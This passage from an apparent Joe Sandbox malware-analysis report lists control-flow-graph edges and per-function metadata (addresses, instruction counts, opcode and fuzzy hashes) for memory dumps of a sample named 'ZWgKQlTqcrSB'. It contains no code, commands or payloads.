7ffd9bbcb3b6-7ffd9bbcb3c8 1446->1457 1447->1416 1447->1433 1448->1452 1450->1430 1458 7ffd9bbcb33a-7ffd9bbcb345 1450->1458 1452->1428 1459 7ffd9bbcb3e8-7ffd9bbcb3f1 1453->1459 1460 7ffd9bbcb42e-7ffd9bbcb43c 1453->1460 1469 7ffd9bbcb504 1454->1469 1470 7ffd9bbcb4b0 1454->1470 1467 7ffd9bbcb3cc-7ffd9bbcb3d4 1457->1467 1458->1457 1463 7ffd9bbcb347-7ffd9bbcb34b 1458->1463 1459->1439 1460->1462 1472 7ffd9bbcb450-7ffd9bbcb454 1462->1472 1473 7ffd9bbcb48c-7ffd9bbcb48f 1462->1473 1463->1467 1468 7ffd9bbcb34d-7ffd9bbcb350 1463->1468 1471 7ffd9bbcb3d5-7ffd9bbcb3d7 1467->1471 1467->1472 1468->1467 1474 7ffd9bbcb352-7ffd9bbcb357 1468->1474 1470->1455 1478 7ffd9bbcb3d8-7ffd9bbcb3d9 1471->1478 1476 7ffd9bbcb455-7ffd9bbcb466 1472->1476 1473->1415 1477 7ffd9bbcb359-7ffd9bbcb371 1474->1477 1474->1478 1476->1452 1477->1420 1478->1476 1479 7ffd9bbcb3da 1478->1479 1480 7ffd9bbcb45b-7ffd9bbcb45d 1479->1480 1481 7ffd9bbcb3db 1479->1481 1480->1448 1481->1441 1484 7ffd9bbcb3dc-7ffd9bbcb3df 1481->1484 1484->1480 1485 7ffd9bbcb3e1-7ffd9bbcb3e5 1484->1485 1485->1436 1485->1448
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: r<_H
                                                                                                                                                                          • API String ID: 0-2284266438
                                                                                                                                                                          • Opcode ID: bfb6634275e34e30d48293274b7a6ff2a8d35c70c6e21440fdf27e5f54ac2e1c
                                                                                                                                                                          • Instruction ID: 226d5257517897396c2e299d09acf834447d0aaff4d0e2bbaa2fcfdc5289e2e9
                                                                                                                                                                          • Opcode Fuzzy Hash: bfb6634275e34e30d48293274b7a6ff2a8d35c70c6e21440fdf27e5f54ac2e1c
                                                                                                                                                                          • Instruction Fuzzy Hash: B3D1DF30B1E94E8FEB78EA5C88755B837D0FF98314B0542B9D45EC75F2DA28A906C781
                                                                                                                                                                          Function 00007FFD9BBC7A26 Relevance: 1.6, Strings: 1, Instructions: 367COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1524 7ffd9bbc7a26-7ffd9bbc7a2c 1525 7ffd9bbc7a36-7ffd9bbc7a54 1524->1525 1526 7ffd9bbc7a2e-7ffd9bbc7a34 1524->1526 1528 7ffd9bbc7a68-7ffd9bbc7a95 1525->1528 1529 7ffd9bbc7a56-7ffd9bbc7a66 1525->1529 1526->1525 1532 7ffd9bbc7d4c-7ffd9bbc7d77 1528->1532 1533 7ffd9bbc7a9b-7ffd9bbc7aa6 1528->1533 1529->1528 1534 7ffd9bbc7aac-7ffd9bbc7aba 1533->1534 1535 7ffd9bbc7b64-7ffd9bbc7b69 1533->1535 1534->1532 1536 7ffd9bbc7ac0-7ffd9bbc7ad1 1534->1536 1538 7ffd9bbc7b6f-7ffd9bbc7b79 1535->1538 1539 7ffd9bbc7bfd-7ffd9bbc7c07 1535->1539 1542 7ffd9bbc7b39-7ffd9bbc7b50 1536->1542 1543 7ffd9bbc7ad3-7ffd9bbc7af6 1536->1543 1538->1532 1544 7ffd9bbc7b7f-7ffd9bbc7b93 1538->1544 1540 7ffd9bbc7c29-7ffd9bbc7c30 1539->1540 1541 7ffd9bbc7c09-7ffd9bbc7c14 1539->1541 1545 7ffd9bbc7c33-7ffd9bbc7c3d 1540->1545 1554 7ffd9bbc7c1b-7ffd9bbc7c27 1541->1554 1542->1532 1548 7ffd9bbc7b56-7ffd9bbc7b5e 1542->1548 1546 7ffd9bbc7b98-7ffd9bbc7b9d 1543->1546 1547 7ffd9bbc7afc-7ffd9bbc7b0f 1543->1547 1544->1545 1545->1532 1551 7ffd9bbc7c43-7ffd9bbc7c5b 1545->1551 1549 7ffd9bbc7b13-7ffd9bbc7b37 1546->1549 1547->1549 1548->1534 1548->1535 1549->1542 1557 7ffd9bbc7ba2-7ffd9bbc7ba5 1549->1557 1551->1532 1553 7ffd9bbc7c61-7ffd9bbc7c79 1551->1553 1553->1532 1555 7ffd9bbc7c7f-7ffd9bbc7cb3 1553->1555 1554->1540 1555->1532 1570 7ffd9bbc7cb9-7ffd9bbc7ccc 1555->1570 1558 7ffd9bbc7ba7-7ffd9bbc7bb7 1557->1558 1559 7ffd9bbc7bbb-7ffd9bbc7bc8 1557->1559 1558->1559 1559->1532 1561 7ffd9bbc7bce-7ffd9bbc7bfc 1559->1561 1572 7ffd9bbc7d2f-7ffd9bbc7d40 1570->1572 1573 7ffd9bbc7cce-7ffd9bbc7cd9 1570->1573 1573->1572 1575 7ffd9bbc7cdb-7ffd9bbc7cf2 1573->1575 1577 7ffd9bbc7cf4-7ffd9bbc7d02 1575->1577 1578 7ffd9bbc7d03-7ffd9bbc7d25 1575->1578 1577->1578 1578->1572
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: d
                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                          • Opcode ID: fa7a1447eb5bff46deb64a1ea1cb5d80de6127ee2b9bb95b416022739c7772a7
                                                                                                                                                                          • Instruction ID: d07a081640ea2c342c90fa9f699560af547b68ca75681b38b29714e37712f602
                                                                                                                                                                          • Opcode Fuzzy Hash: fa7a1447eb5bff46deb64a1ea1cb5d80de6127ee2b9bb95b416022739c7772a7
                                                                                                                                                                          • Instruction Fuzzy Hash: 69B1FE31B19A0A8FD758EF0CD4A1975B3E1FF94314B1145B9D84ACB2AACA35FD42CB81
                                                                                                                                                                          Function 00007FFD9BBC55E8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                                          • Opcode ID: 6cce641990ba0253bdf70e0760fc4502d6156dc8e87802889eee0583be25c0d1
                                                                                                                                                                          • Instruction ID: 9619cbde2d20eda609180ee150480db90838ad538573d2489f2e97452d77bd22
                                                                                                                                                                          • Opcode Fuzzy Hash: 6cce641990ba0253bdf70e0760fc4502d6156dc8e87802889eee0583be25c0d1
                                                                                                                                                                          • Instruction Fuzzy Hash: B6519C71E0964E8FDB69EB98C4A25FDB7B1FF54304F1540BAC01AE72E2CA346A41CB40
                                                                                                                                                                          Function 00007FFD9BBC3560 Relevance: .7, Instructions: 667COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d6cb423521a68fda44580aff55689e8a491d9f665437be76346a4ab60724db54
                                                                                                                                                                          • Instruction ID: 5f5e5ccf093cd7d491e66091360b1e5eefa9c94dd3dc1e298a601965db3c4e59
                                                                                                                                                                          • Opcode Fuzzy Hash: d6cb423521a68fda44580aff55689e8a491d9f665437be76346a4ab60724db54
                                                                                                                                                                          • Instruction Fuzzy Hash: 38228330B19A1D8FDBA8EB4CC8A6A7973E1FF54314B5141B9D00EC72A2DA35ED45CB81
                                                                                                                                                                          Function 00007FFD9BF800C5 Relevance: .4, Instructions: 361COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 570545f154d4f42fa04ea89413bc9ad1a23a4a734bc74afb07349d25872648c1
                                                                                                                                                                          • Instruction ID: 86736c9d0c4015542f5fc1eef4a17dc860de99661463d80bfa8907c0267d04eb
                                                                                                                                                                          • Opcode Fuzzy Hash: 570545f154d4f42fa04ea89413bc9ad1a23a4a734bc74afb07349d25872648c1
                                                                                                                                                                          • Instruction Fuzzy Hash: 1F411523B4EA5B97F3367FF8A0719F867809F01B54B4A03B6D49F850E38C5B39554285
                                                                                                                                                                          Function 00007FFD9BBC68C7 Relevance: .4, Instructions: 359COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3a6487f00a0f13ab745d5a72ddf74e5ba2c33674e1b241e03173ddd910476fdc
                                                                                                                                                                          • Instruction ID: d0e0f5e01791d06f6fec8ceb01095d0de77ceeb6a3e07a8910ed36b4433f8177
                                                                                                                                                                          • Opcode Fuzzy Hash: 3a6487f00a0f13ab745d5a72ddf74e5ba2c33674e1b241e03173ddd910476fdc
                                                                                                                                                                          • Instruction Fuzzy Hash: D1C1E230A0EB4A8FD379EB68C4A197577E1FF54308B1545BEC48BC36E2DA29B942C741
                                                                                                                                                                          Function 00007FFD9BF8A9BF Relevance: .3, Instructions: 344COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4edcf17e2df8b04aa9950000cba2147a848489b4d21b371d7833599af4b5969f
                                                                                                                                                                          • Instruction ID: 7b0d1d925c76419e8257d013f8bba482d28ea5b6fe9570681dffa944d90156f3
                                                                                                                                                                          • Opcode Fuzzy Hash: 4edcf17e2df8b04aa9950000cba2147a848489b4d21b371d7833599af4b5969f
                                                                                                                                                                          • Instruction Fuzzy Hash: 74D1D23061994A8FEB5DCF58C0E05B177A1FF49301B6546BDC84BCB69ADA38F981CB80
                                                                                                                                                                          Function 00007FFD9BBC587F Relevance: .3, Instructions: 315COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 05cdaa1000dfb24cfe2dcf3dd31a8addb212961557dfe62b657975de177a2754
                                                                                                                                                                          • Instruction ID: 2551d47b553095424d8121eb30b8ef2b5555ed0710a5b62bed5afa58c2dd2ade
                                                                                                                                                                          • Opcode Fuzzy Hash: 05cdaa1000dfb24cfe2dcf3dd31a8addb212961557dfe62b657975de177a2754
                                                                                                                                                                          • Instruction Fuzzy Hash: 75C1CF3061A50A8BEB2CDF58C0E15B53BA1FF45308B5545BDD89B8B6DBCB78E981CB40
                                                                                                                                                                          Function 00007FFD9BF8A9DF Relevance: .3, Instructions: 314COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 644a401e5888f8c5d9abdfcaee48c32e308250ddfa66912768839c4f893577df
                                                                                                                                                                          • Instruction ID: a580fe56ed938d662983feb47c4eb4a42ae7425a0340af5fecec0fc6147efc8f
                                                                                                                                                                          • Opcode Fuzzy Hash: 644a401e5888f8c5d9abdfcaee48c32e308250ddfa66912768839c4f893577df
                                                                                                                                                                          • Instruction Fuzzy Hash: 28C1B23065994A8BEB2DCF58C0E05B177A1FF45305B6546BDC84B8B69BDA38F981CB80
                                                                                                                                                                          Function 00007FFD9BBCB677 Relevance: .3, Instructions: 299COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 92d2404b771b1eb079bfb96ff326d8d11aa32f0746a0d9da6fdb87da95f644be
                                                                                                                                                                          • Instruction ID: 2988d4c41f5f743ca3dedd1e32923c939f9015a117a9199f1e6cd683e6388783
                                                                                                                                                                          • Opcode Fuzzy Hash: 92d2404b771b1eb079bfb96ff326d8d11aa32f0746a0d9da6fdb87da95f644be
                                                                                                                                                                          • Instruction Fuzzy Hash: E021D712F0F59F86F674F6AD48714BCB650BF18718F16417EC44E860E2DC0C2A45D356
                                                                                                                                                                          Function 00007FFD9BBC5112 Relevance: .3, Instructions: 299COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5c15f6ad2ed7a92946931862ba8ce33d4744e07afd351f57e65bd3b7a43e5a6a
                                                                                                                                                                          • Instruction ID: 38028f1ae99ff5c181efeffb8358b496e8bca110e56a0a2f5f985ab78ed1d9ce
                                                                                                                                                                          • Opcode Fuzzy Hash: 5c15f6ad2ed7a92946931862ba8ce33d4744e07afd351f57e65bd3b7a43e5a6a
                                                                                                                                                                          • Instruction Fuzzy Hash: 35B1D030B09A4A8FE759EF58C0A26B4B7A1FF58304F5541B9C04EC7AD6CB68F951CB90
                                                                                                                                                                          Function 00007FFD9BF80167 Relevance: .3, Instructions: 298COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8b845ff396f3f01cb1b68eb5ee76f69c695837cdbae64b6f4bf987152779eca1
                                                                                                                                                                          • Instruction ID: caf4b82b2580c0af3d8c8054938764f7b4d0ad86f0aecfd20f930124cfe177cb
                                                                                                                                                                          • Opcode Fuzzy Hash: 8b845ff396f3f01cb1b68eb5ee76f69c695837cdbae64b6f4bf987152779eca1
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B21E713F8F99F8BF3396EF814725F85A405F11A60B4A03B6C48FC60E2CC5F29551286
                                                                                                                                                                          Function 00007FFD9BBC2AF3 Relevance: .3, Instructions: 296COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0762acdcbefe71725b3064af5b5ce2a298e6d9593941f4c43f38415a4ab69b09
                                                                                                                                                                          • Instruction ID: d07f3e6cdd10a311b1fa9ee6e5dd9ada121db3cc6b90cc22b74680ba14e1c4df
                                                                                                                                                                          • Opcode Fuzzy Hash: 0762acdcbefe71725b3064af5b5ce2a298e6d9593941f4c43f38415a4ab69b09
                                                                                                                                                                          • Instruction Fuzzy Hash: 4621F711F0F68B86F679B6FC54310BC56507F60328F2A06B6C48E860F7DC4D3A4AD282
                                                                                                                                                                          Function 00007FFD9BF90DAE Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 191ac722dd75d87b937cc301bd0bd279054be7e22252c6a22f42912cd9b2015e
                                                                                                                                                                          • Instruction ID: 9448fc18ba24c5a3b88e230b8278bafdfaf24d9e8ae995134cb9b5e48f476b9e
                                                                                                                                                                          • Opcode Fuzzy Hash: 191ac722dd75d87b937cc301bd0bd279054be7e22252c6a22f42912cd9b2015e
                                                                                                                                                                          • Instruction Fuzzy Hash: 4421A103F5F59B9AF6761EF924329BC5A80AF51B14F1B03B6D45E860E2CD0F3B405282
                                                                                                                                                                          Function 00007FFD9BBC585F Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2f59d03601524a618acb6154fa45cd6968c4d5098dee9500a985a67fb06800e3
                                                                                                                                                                          • Instruction ID: 0fda4510b30c7351f5e1720abf5db766b40f2850cc11d7e9b2d7295c65c0e4a2
                                                                                                                                                                          • Opcode Fuzzy Hash: 2f59d03601524a618acb6154fa45cd6968c4d5098dee9500a985a67fb06800e3
                                                                                                                                                                          • Instruction Fuzzy Hash: A3B1BC706166058FEB59DF48C0E16B53BA1FF49304B9541FCC85B8B69ACB78E982CB81
                                                                                                                                                                          Function 00007FFD9BF85467 Relevance: .3, Instructions: 251COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1b34720e3aa4b5e781e95cf4eddb590da446286c6a7f8e142fe9ba8858627128
                                                                                                                                                                          • Instruction ID: ffabc77167515c471056c85b33d2e6ac726c0588ba454307c9c43c9a7cba5fd2
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b34720e3aa4b5e781e95cf4eddb590da446286c6a7f8e142fe9ba8858627128
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E712431A4EC4D4FE778DE5888265B837E1EF44315B0613B9D05FCB5B2DE2AAA068781
                                                                                                                                                                          Function 00007FFD9BBC277D Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 47e1d96b1bc159ca92f0880a0102915565f9e9ada27bc6caf5f3e79a77b6a878
                                                                                                                                                                          • Instruction ID: ccb29d241e0ed963f557cfe30e77b11c286a70595587f9284b963a66d37a76af
                                                                                                                                                                          • Opcode Fuzzy Hash: 47e1d96b1bc159ca92f0880a0102915565f9e9ada27bc6caf5f3e79a77b6a878
                                                                                                                                                                          • Instruction Fuzzy Hash: 8471AF34B0994D8FEBB8EA8CC8655B837D1FF58315B160279D49EC75F1DA28E906C780
                                                                                                                                                                          Function 00007FFD9BF878FD Relevance: .2, Instructions: 231COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 51332c643f2416138e85563993635dc150c4994a1181b3be95f02619c20aa160
                                                                                                                                                                          • Instruction ID: 79312cdb384886b4ac65312db2d75e2d370a86161177fa4004cc9566d31af296
                                                                                                                                                                          • Opcode Fuzzy Hash: 51332c643f2416138e85563993635dc150c4994a1181b3be95f02619c20aa160
                                                                                                                                                                          • Instruction Fuzzy Hash: 8C61F631B9E94D4FE778DE5888666B5B7C0EF4531070603B9D09FC35B2DA2AAA068781
                                                                                                                                                                          Function 00007FFD9BBC334B Relevance: .2, Instructions: 228COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5d6a2e2f347a6d89c773716401ea907c8439d9c749a701cb07403c3e6049cba9
                                                                                                                                                                          • Instruction ID: ffc7252c820a0bd4ddb39084cf75bc11b9ba167ee1c71ed687aae0a16532cf05
                                                                                                                                                                          • Opcode Fuzzy Hash: 5d6a2e2f347a6d89c773716401ea907c8439d9c749a701cb07403c3e6049cba9
                                                                                                                                                                          • Instruction Fuzzy Hash: 07719130F1E54E8EEBA5EBA884666BC77A1FF45304F9104BAD00ED71E5DE386941C741
                                                                                                                                                                          Function 00007FFD9BBC7829 Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: fa1d4ce289f2e1f000958165fce91e31a5974278f4978f215758c36aa230a24d
                                                                                                                                                                          • Instruction ID: 7e40c1d230852758aa2d0c61fc99843b22582919cd5e9ea34b3a334d18b2a6b2
                                                                                                                                                                          • Opcode Fuzzy Hash: fa1d4ce289f2e1f000958165fce91e31a5974278f4978f215758c36aa230a24d
                                                                                                                                                                          • Instruction Fuzzy Hash: D351353260EB494FE76AEA6D98949707BE0FF5632471602BEC099C71B3D929B843C741
                                                                                                                                                                          Function 00007FFD9BF884AB Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 46a5660f665e7f471fa6baa25e396420456d330d9a715f90a318b47808eae821
                                                                                                                                                                          • Instruction ID: 5dbb298ccea5318717f27f5190495aeb40aa520a1d6b2e572c485744d750187f
                                                                                                                                                                          • Opcode Fuzzy Hash: 46a5660f665e7f471fa6baa25e396420456d330d9a715f90a318b47808eae821
                                                                                                                                                                          • Instruction Fuzzy Hash: 9471A131E5E94E8EEBA5DFA488646BC7BA1FF45310F1106BAD00FD71E1DE3A69418701
                                                                                                                                                                          Function 00007FFD9BBCBEEB Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
